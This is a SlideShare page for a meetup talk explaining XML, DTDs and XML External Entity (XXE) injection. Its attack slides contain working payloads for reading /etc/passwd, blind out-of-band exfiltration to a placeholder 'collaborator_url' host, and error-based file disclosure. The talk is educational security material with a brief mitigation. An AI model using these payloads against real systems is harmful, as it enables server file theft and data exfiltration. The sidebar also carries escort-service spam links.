SlideShare ist ein Scribd-Unternehmen logo

XXE Attack Document: Understanding XML External Entity (XXE) Injection

Als PPTX, PDF herunterladen
N
nullowaspmumbai

This document discusses XML External Entity (XXE) attacks. It begins with an overview of XXE attacks and their ranking in the OWASP Top 10 list. It then provides background on XML, explaining what it is, how it is structured, and how to define DTDs. The document demonstrates different types of XXE attacks like retrieving files, performing server-side request forgery, and exfiltrating data blindly. It also covers mitigations like disabling external entities.

Software
1 von 34
<null>alert(XXE)</null>
@nullmumbai: whoami # Ankit Patel # Associate Consultant (Aujas Cybersecurity) # Application Security and Network Security # Twitter Handle: @pwnnull
# Description:  An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.  Ranked on 4th of OWASP Top 10 (2017). - OWASP
Let’s Dive into Basic’s
# What is XML?  XML stands for eXtensible Markup Language. It is a text-based markup language.  XML was released in late 90’s. it was created to provide an easy to use and store self describing data.  XML is designed to carry data, not to display data.  XML tags are not predefined. You must define your own tags.  XML is platform independent and language independent.
# XML Example: <?xml version = "1.0"?> <NullMeet> <Speaker> <FirstName>Ankit</FirstName> <LastName>Patel</LastName> <ContactNo>1234567890</ContactNo> <Email>ankitpatel@null_mumbai.com</Email> <City>Mumbai</City> </Speaker> </NullMeet>
# XML Attributes vs Elements  XML using attributes: <person gender=“male"> <firstname>Ankit</firstname> <lastname>Patel</lastname> </person>  XML using elements: <person> <gender>male</gender> <firstname>Ankit</firstname> <lastname>Patel</lastname> </person>
# XML DTD  Document Type Declaration, commonly known as DTD.  A DTD defines the structure and the legal elements and attributes of an XML document.  Why use DTD?  An application can use a DTD to verify that XML is valid.
# Types of DTD  There are two types of DTD :-  Internal DTD  External DTD  Internal DTD  If the DTD is declared inside the XML file, it must be wrapped inside the <!DOCTYPE> definition.  External DTD  If the DTD is declared in an external file, the <!DOCTYPE> definition must contain a reference to the DTD file.
# Internal DTD
# Internal DTD  !DOCTYPE NullMeet defines that the root element of this document is NullMeet.  !ELEMENT NullMeet defines that the NullMeet element must contain four elements: “FirstName, LastName, ContactNo, Email, City“.  !ELEMENT “FirstName, LastName, ContactNo, Email, City” defines the to element to be of type "#PCDATA“.
# External DTD  If the DTD is declared in an external file, the <!DOCTYPE> definition must contain a reference to the DTD file.  External dtd file :-
# External DTD  XML file contents :-
# XML DTD entities  Entities are used to define shortcuts to special characters.  Entities can be declared internal or external.  Internal Entity An internal entity is one that is defined locally within a DTD.  Declaring the internal entity  Entities must be declared before they can be used.  All entities are declared with the "ENTITY" declaration.
# XML DTD built-in entities  All XML parsers must support built-in entities.  There are five built-in entities that play their role in well-formed XML, they are: -  ampersand: &amp;  Single quote: &apos;  Greater than: &gt;  Less than: &lt;  Double quote: &quot;
# XML DTD entities  Internal entity example :- I. Syntax <!ENTITY entity-name "entity-value"> II. Internal DTD Example <!DOCTYPE Nullmum [ <!ENTITY writer "Ankit"> ]> The XML file :- <Nullmum>&writer;<Nullmum>
# XML DTD entities  External entity External entities, like internal entities, have names and are referenced in the same manner, although they are declared differently.  External entity example :- I. Syntax <!ENTITY entity-name SYSTEM "URI/URL"> // SYSTEM keyword and must specify a URL ( Protocols like http, ftp, file, etc are allowed). II. External DTD Example The XML file :- <!ENTITY writer SYSTEM "https://www.w3schools.com/external.dtd"> <author>&writer;</author>
Basics over, Let’s jump to the main(XXE)
# Types of XXE attacks There are various types of XXE attacks:  Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, returned in the application's response.  Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.  Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.  Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.
Exploiting XXE to retrieve files  Payload used:- <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> XML file :- <productId>&xxe;</productId>
DEMO
Exploiting XXE to perform SSRF attacks
DEMO
# Parameter Entities  Parameter entities accomplish the same task as the other entities do.  Parameter entities are used exclusively within DTDs.  Using parameter entities you can include element and attribute list declarations as groups and refer to them easily as single entities.  You can even include an entire DTD in a parameter entity. Example :- <!ENTITY % myParameterEntity “Element" >
# Parameter Entities  Example :- <!ENTITY % customer "name, street, city, state, zipcode">  Later in the DTD, you can reference this parameter entity as follows :- <!ELEMENT invoice (%customer;, item, price, date)>  When this DTD is processed, it is as if you had specified the following :- <!ELEMENT invoice (name, street, city, state, zipcode, item, price, date)>
Exploiting blind XXE exfiltrate data out-of-band
Exploiting blind XXE exfiltrate data out-of-band  Payloads used :- <!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://collaborator_url/?x=%file;’>”> %eval; %exfil; XML file :- <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
DEMO
Exploiting blind XXE to retrieve data via error messages  Payloads used :- <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil; XML file:- <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
DEMO
# Mitigation for XXE  Disable external entities.
References:  https://www.w3schools.com/xml/xml_whatis.asp  https://portswigger.net/web-security/xxe  https://www.synack.com/blog/a-deep-dive-into-xxe-injection  https://www.youtube.com/watch?v=gjm6VHZa_8s
Thank you null|Mumbai for the opportunity

Empfohlen

Xml2
Xml2Xml2
Xml2Abhishek Kesharwani
 
Xml Presentation-3
Xml Presentation-3Xml Presentation-3
Xml Presentation-3Sudharsan S
 
Dtd
DtdDtd
DtdManish Chaurasia
 
Jungahan web presentation
Jungahan web presentationJungahan web presentation
Jungahan web presentationgarden8an
 
Xml dtd
Xml dtdXml dtd
Xml dtdHeenaRajput1
 
Xml dtd- Document Type Definition- Web Technology
Xml dtd- Document Type Definition- Web TechnologyXml dtd- Document Type Definition- Web Technology
Xml dtd- Document Type Definition- Web TechnologyRajan Shah
 
Xml dtd
Xml dtdXml dtd
Xml dtdsana mateen
 
Dtd
DtdDtd
DtdAbhishek Kesharwani
 

Empfohlen

Xml2
Xml2Xml2
Xml2Abhishek Kesharwani
 
Xml Presentation-3
Xml Presentation-3Xml Presentation-3
Xml Presentation-3Sudharsan S
 
Dtd
DtdDtd
DtdManish Chaurasia
 
Jungahan web presentation
Jungahan web presentationJungahan web presentation
Jungahan web presentationgarden8an
 
Xml dtd
Xml dtdXml dtd
Xml dtdHeenaRajput1
 
Xml dtd- Document Type Definition- Web Technology
Xml dtd- Document Type Definition- Web TechnologyXml dtd- Document Type Definition- Web Technology
Xml dtd- Document Type Definition- Web TechnologyRajan Shah
 
Xml dtd
Xml dtdXml dtd
Xml dtdsana mateen
 
Dtd
DtdDtd
DtdAbhishek Kesharwani
 
XML's validation - DTD
XML's validation - DTDXML's validation - DTD
XML's validation - DTDvidede_group
 
DTD
DTDDTD
DTDKamal Acharya
 
uptu web technology unit 2 Xml2
uptu web technology unit 2 Xml2uptu web technology unit 2 Xml2
uptu web technology unit 2 Xml2Abhishek Kesharwani
 
03 namespace
03 namespace03 namespace
03 namespaceBaskarkncet
 
Difference between dtd and xsd
Difference between dtd and xsdDifference between dtd and xsd
Difference between dtd and xsdUmar Ali
 
uptu web technology unit 2 Xml2
uptu web technology unit 2 Xml2uptu web technology unit 2 Xml2
uptu web technology unit 2 Xml2Abhishek Kesharwani
 
Ext Js Dom Helper
Ext Js Dom HelperExt Js Dom Helper
Ext Js Dom Helperjason hu 金良胡
 
Document Type Definitions
Document Type DefinitionsDocument Type Definitions
Document Type DefinitionsRandy Riness @ South Puget Sound Community College
 
2 dtd - validating xml documents
2 dtd - validating xml documents2 dtd - validating xml documents
2 dtd - validating xml documentsgauravashq
 
Ext Js Dom Navigation
Ext Js Dom NavigationExt Js Dom Navigation
Ext Js Dom Navigationjason hu 金良胡
 
Xml basics
Xml basicsXml basics
Xml basicsKumar
 
Document type definition
Document type definitionDocument type definition
Document type definitionRaghu nath
 
XML DTD DOCUMENT TYPE DEFINITION
XML DTD DOCUMENT TYPE DEFINITIONXML DTD DOCUMENT TYPE DEFINITION
XML DTD DOCUMENT TYPE DEFINITIONSaraswathiRamalingam
 
Xml
XmlXml
Xmlphilipsinter
 
Dtd
DtdDtd
Dtdvikram singh
 
Xml basics for beginning
Xml basics for beginningXml basics for beginning
Xml basics for beginningAhmad Awsaf-uz-zaman
 
Xml by Luqman
Xml by LuqmanXml by Luqman
Xml by LuqmanLuqman Shareef
 
Introduction to XML
Introduction to XMLIntroduction to XML
Introduction to XMLyht4ever
 
Unit iv xml
Unit iv xmlUnit iv xml
Unit iv xmlsmitha273566
 
It8074 soa-unit i
It8074 soa-unit iIt8074 soa-unit i
It8074 soa-unit iRevathiAPICSE
 
it8074-soa-uniti-.pdf
it8074-soa-uniti-.pdfit8074-soa-uniti-.pdf
it8074-soa-uniti-.pdfFreeFire293813
 
2-DTD.ppt
2-DTD.ppt2-DTD.ppt
2-DTD.pptKGSCSEPSGCT
 

Weitere ähnliche Inhalte

Was ist angesagt?

XML's validation - DTD
XML's validation - DTDXML's validation - DTD
XML's validation - DTDvidede_group
 
Difference between dtd and xsd
Difference between dtd and xsdDifference between dtd and xsd
Difference between dtd and xsdUmar Ali
 
2 dtd - validating xml documents
2 dtd - validating xml documents2 dtd - validating xml documents
2 dtd - validating xml documentsgauravashq
 
Xml basics
Xml basicsXml basics
Xml basicsKumar
 
Document type definition
Document type definitionDocument type definition
Document type definitionRaghu nath
 
Introduction to XML
Introduction to XMLIntroduction to XML
Introduction to XMLyht4ever
 

Was ist angesagt? (18)

XML's validation - DTD
XML's validation - DTDXML's validation - DTD
XML's validation - DTD
 
DTD
DTDDTD
DTD
 
uptu web technology unit 2 Xml2
uptu web technology unit 2 Xml2uptu web technology unit 2 Xml2
uptu web technology unit 2 Xml2
 
03 namespace
03 namespace03 namespace
03 namespace
 
Difference between dtd and xsd
Difference between dtd and xsdDifference between dtd and xsd
Difference between dtd and xsd
 
uptu web technology unit 2 Xml2
uptu web technology unit 2 Xml2uptu web technology unit 2 Xml2
uptu web technology unit 2 Xml2
 
Ext Js Dom Helper
Ext Js Dom HelperExt Js Dom Helper
Ext Js Dom Helper
 
Document Type Definitions
Document Type DefinitionsDocument Type Definitions
Document Type Definitions
 
2 dtd - validating xml documents
2 dtd - validating xml documents2 dtd - validating xml documents
2 dtd - validating xml documents
 
Ext Js Dom Navigation
Ext Js Dom NavigationExt Js Dom Navigation
Ext Js Dom Navigation
 
Xml basics
Xml basicsXml basics
Xml basics
 
Document type definition
Document type definitionDocument type definition
Document type definition
 
XML DTD DOCUMENT TYPE DEFINITION
XML DTD DOCUMENT TYPE DEFINITIONXML DTD DOCUMENT TYPE DEFINITION
XML DTD DOCUMENT TYPE DEFINITION
 
Xml
XmlXml
Xml
 
Dtd
DtdDtd
Dtd
 
Xml basics for beginning
Xml basics for beginningXml basics for beginning
Xml basics for beginning
 
Xml by Luqman
Xml by LuqmanXml by Luqman
Xml by Luqman
 
Introduction to XML
Introduction to XMLIntroduction to XML
Introduction to XML
 

Ähnlich wie XXE Attack Document: Understanding XML External Entity (XXE) Injection

Xml Presentation-1
Xml Presentation-1Xml Presentation-1
Xml Presentation-1Sudharsan S
 
distributed system concerned lab sessions
distributed system concerned lab sessionsdistributed system concerned lab sessions
distributed system concerned lab sessionsmilkesa13
 
M.FLORENCE DAYANA WEB DESIGN -Unit 5 XML
M.FLORENCE DAYANA WEB DESIGN -Unit 5 XMLM.FLORENCE DAYANA WEB DESIGN -Unit 5 XML
M.FLORENCE DAYANA WEB DESIGN -Unit 5 XMLDr.Florence Dayana
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)Jay Thakker
 
01 xml document structure
01 xml document structure01 xml document structure
01 xml document structureBaskarkncet
 

Ähnlich wie XXE Attack Document: Understanding XML External Entity (XXE) Injection (20)

Unit iv xml
Unit iv xmlUnit iv xml
Unit iv xml
 
It8074 soa-unit i
It8074 soa-unit iIt8074 soa-unit i
It8074 soa-unit i
 
it8074-soa-uniti-.pdf
it8074-soa-uniti-.pdfit8074-soa-uniti-.pdf
it8074-soa-uniti-.pdf
 
2-DTD.ppt
2-DTD.ppt2-DTD.ppt
2-DTD.ppt
 
Xml
XmlXml
Xml
 
Xml11
Xml11Xml11
Xml11
 
Xml Presentation-1
Xml Presentation-1Xml Presentation-1
Xml Presentation-1
 
Xml2
Xml2Xml2
Xml2
 
Unit 5 xml (1)
Unit 5 xml (1)Unit 5 xml (1)
Unit 5 xml (1)
 
Xml and DTD's
Xml and DTD'sXml and DTD's
Xml and DTD's
 
XML.ppt
XML.pptXML.ppt
XML.ppt
 
Xml
XmlXml
Xml
 
Tp2
Tp2Tp2
Tp2
 
distributed system concerned lab sessions
distributed system concerned lab sessionsdistributed system concerned lab sessions
distributed system concerned lab sessions
 
WEB PROGRAMMING
WEB PROGRAMMINGWEB PROGRAMMING
WEB PROGRAMMING
 
It8074 soa-unit i
It8074 soa-unit iIt8074 soa-unit i
It8074 soa-unit i
 
M.FLORENCE DAYANA WEB DESIGN -Unit 5 XML
M.FLORENCE DAYANA WEB DESIGN -Unit 5 XMLM.FLORENCE DAYANA WEB DESIGN -Unit 5 XML
M.FLORENCE DAYANA WEB DESIGN -Unit 5 XML
 
XML-Unit 1.ppt
XML-Unit 1.pptXML-Unit 1.ppt
XML-Unit 1.ppt
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)
 
01 xml document structure
01 xml document structure01 xml document structure
01 xml document structure
 

Mehr von nullowaspmumbai

ELK in Security Analytics
ELK in Security Analytics ELK in Security Analytics
ELK in Security Analytics nullowaspmumbai
 
Infrastructure security & Incident Management
Infrastructure security & Incident Management Infrastructure security & Incident Management
Infrastructure security & Incident Management nullowaspmumbai
 
Internet censorship circumvention techniques
Internet censorship circumvention techniquesInternet censorship circumvention techniques
Internet censorship circumvention techniquesnullowaspmumbai
 
Adversarial machine learning updated
Adversarial machine learning updatedAdversarial machine learning updated
Adversarial machine learning updatednullowaspmumbai
 
Adversarial machine learning
Adversarial machine learning Adversarial machine learning
Adversarial machine learning nullowaspmumbai
 
Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool nullowaspmumbai
 
Ganesh naik linux_kernel_internals
Ganesh naik linux_kernel_internalsGanesh naik linux_kernel_internals
Ganesh naik linux_kernel_internalsnullowaspmumbai
 
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat DasNull Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat Dasnullowaspmumbai
 

Mehr von nullowaspmumbai (20)

ELK in Security Analytics
ELK in Security Analytics ELK in Security Analytics
ELK in Security Analytics
 
Switch security
Switch securitySwitch security
Switch security
 
Radio hacking - Part 1
Radio hacking - Part 1 Radio hacking - Part 1
Radio hacking - Part 1
 
How I got my First CVE
How I got my First CVE How I got my First CVE
How I got my First CVE
 
Power forensics
Power forensicsPower forensics
Power forensics
 
Infrastructure security & Incident Management
Infrastructure security & Incident Management Infrastructure security & Incident Management
Infrastructure security & Incident Management
 
Middleware hacking
Middleware hackingMiddleware hacking
Middleware hacking
 
Internet censorship circumvention techniques
Internet censorship circumvention techniquesInternet censorship circumvention techniques
Internet censorship circumvention techniques
 
How i got my first cve
How i got my first cveHow i got my first cve
How i got my first cve
 
Adversarial machine learning updated
Adversarial machine learning updatedAdversarial machine learning updated
Adversarial machine learning updated
 
Commix
Commix Commix
Commix
 
Adversarial machine learning
Adversarial machine learning Adversarial machine learning
Adversarial machine learning
 
Dll Hijacking
Dll Hijacking Dll Hijacking
Dll Hijacking
 
Abusing Target
Abusing Target Abusing Target
Abusing Target
 
NTFS Forensics
NTFS Forensics NTFS Forensics
NTFS Forensics
 
Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool Drozer - An Android Application Security Tool
Drozer - An Android Application Security Tool
 
Middleware hacking
Middleware hackingMiddleware hacking
Middleware hacking
 
Ganesh naik linux_kernel_internals
Ganesh naik linux_kernel_internalsGanesh naik linux_kernel_internals
Ganesh naik linux_kernel_internals
 
Buffer overflow null
Buffer overflow nullBuffer overflow null
Buffer overflow null
 
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat DasNull Mumbai Meet_Android Reverse Engineering by Samrat Das
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
 

Kürzlich hochgeladen

Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...MyIntelliSource, Inc.
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 

Kürzlich hochgeladen (20)

Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Exploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the ProcessExploring iOS App Development: Simplifying the Process
Exploring iOS App Development: Simplifying the Process
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
Try MyIntelliAccount Cloud Accounting Software As A Service Solution Risk Fre...
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 

XXE Attack Document: Understanding XML External Entity (XXE) Injection

  • 2. @nullmumbai: whoami # Ankit Patel # Associate Consultant (Aujas Cybersecurity) # Application Security and Network Security # Twitter Handle: @pwnnull
  • 3. # Description:  An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.  Ranked on 4th of OWASP Top 10 (2017). - OWASP
  • 4. Let’s Dive into Basic’s
  • 5. # What is XML?  XML stands for eXtensible Markup Language. It is a text-based markup language.  XML was released in late 90’s. it was created to provide an easy to use and store self describing data.  XML is designed to carry data, not to display data.  XML tags are not predefined. You must define your own tags.  XML is platform independent and language independent.
  • 6. # XML Example: <?xml version = "1.0"?> <NullMeet> <Speaker> <FirstName>Ankit</FirstName> <LastName>Patel</LastName> <ContactNo>1234567890</ContactNo> <Email>ankitpatel@null_mumbai.com</Email> <City>Mumbai</City> </Speaker> </NullMeet>
  • 7.
  • 8. # XML Attributes vs Elements  XML using attributes: <person gender=“male"> <firstname>Ankit</firstname> <lastname>Patel</lastname> </person>  XML using elements: <person> <gender>male</gender> <firstname>Ankit</firstname> <lastname>Patel</lastname> </person>
  • 9. # XML DTD  Document Type Declaration, commonly known as DTD.  A DTD defines the structure and the legal elements and attributes of an XML document.  Why use DTD?  An application can use a DTD to verify that XML is valid.
  • 10. # Types of DTD  There are two types of DTD :-  Internal DTD  External DTD  Internal DTD  If the DTD is declared inside the XML file, it must be wrapped inside the <!DOCTYPE> definition.  External DTD  If the DTD is declared in an external file, the <!DOCTYPE> definition must contain a reference to the DTD file.
  • 12. # Internal DTD  !DOCTYPE NullMeet defines that the root element of this document is NullMeet.  !ELEMENT NullMeet defines that the NullMeet element must contain four elements: “FirstName, LastName, ContactNo, Email, City“.  !ELEMENT “FirstName, LastName, ContactNo, Email, City” defines the to element to be of type "#PCDATA“.
  • 13. # External DTD  If the DTD is declared in an external file, the <!DOCTYPE> definition must contain a reference to the DTD file.  External dtd file :-
  • 14. # External DTD  XML file contents :-
  • 15. # XML DTD entities  Entities are used to define shortcuts to special characters.  Entities can be declared internal or external.  Internal Entity An internal entity is one that is defined locally within a DTD.  Declaring the internal entity  Entities must be declared before they can be used.  All entities are declared with the "ENTITY" declaration.
  • 16. # XML DTD built-in entities  All XML parsers must support built-in entities.  There are five built-in entities that play their role in well-formed XML, they are: -  ampersand: &amp;  Single quote: &apos;  Greater than: &gt;  Less than: &lt;  Double quote: &quot;
  • 17. # XML DTD entities  Internal entity example :- I. Syntax <!ENTITY entity-name "entity-value"> II. Internal DTD Example <!DOCTYPE Nullmum [ <!ENTITY writer "Ankit"> ]> The XML file :- <Nullmum>&writer;<Nullmum>
  • 18. # XML DTD entities  External entity External entities, like internal entities, have names and are referenced in the same manner, although they are declared differently.  External entity example :- I. Syntax <!ENTITY entity-name SYSTEM "URI/URL"> // SYSTEM keyword and must specify a URL ( Protocols like http, ftp, file, etc are allowed). II. External DTD Example The XML file :- <!ENTITY writer SYSTEM "https://www.w3schools.com/external.dtd"> <author>&writer;</author>
  • 19. Basics over, Let’s jump to the main(XXE)
  • 20. # Types of XXE attacks There are various types of XXE attacks:  Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, returned in the application's response.  Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.  Exploiting blind XXE exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.  Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.
  • 21. Exploiting XXE to retrieve files  Payload used:- <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> XML file :- <productId>&xxe;</productId>
  • 22. DEMO
  • 23. Exploiting XXE to perform SSRF attacks
  • 24. DEMO
  • 25. # Parameter Entities  Parameter entities accomplish the same task as the other entities do.  Parameter entities are used exclusively within DTDs.  Using parameter entities you can include element and attribute list declarations as groups and refer to them easily as single entities.  You can even include an entire DTD in a parameter entity. Example :- <!ENTITY % myParameterEntity “Element" >
